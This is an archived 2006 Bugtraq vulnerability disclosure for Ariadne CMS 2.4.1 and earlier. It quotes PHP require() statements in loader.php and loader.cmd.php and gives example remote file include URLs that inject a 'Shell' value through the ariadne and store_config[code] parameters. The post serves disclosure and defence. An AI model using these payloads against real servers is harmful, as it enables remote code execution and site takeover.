lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061106183051.22478.qmail@securityfocus.com>
Date: 6 Nov 2006 18:30:51 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)

*******************************************************************************
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

*******************************************************************************
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..
....
require($ariadne."/configs/ariadne.phtml");
    require($ariadne."/configs/ftp/$configfile");
	require($ariadne."/configs/store.phtml");
	require($ariadne."/includes/loader.ftp.php");
	require($ariadne."/configs/sessions.phtml");
	require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
	require($ariadne."/nls/en");
	require($ariadne."/modules/mod_mimemagic.php");
	
	require($ariadne."/modules/mod_virusscan.php");
....
..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

\Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell
....

# ajann,Turkey
# ...
# Im not Hacker!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ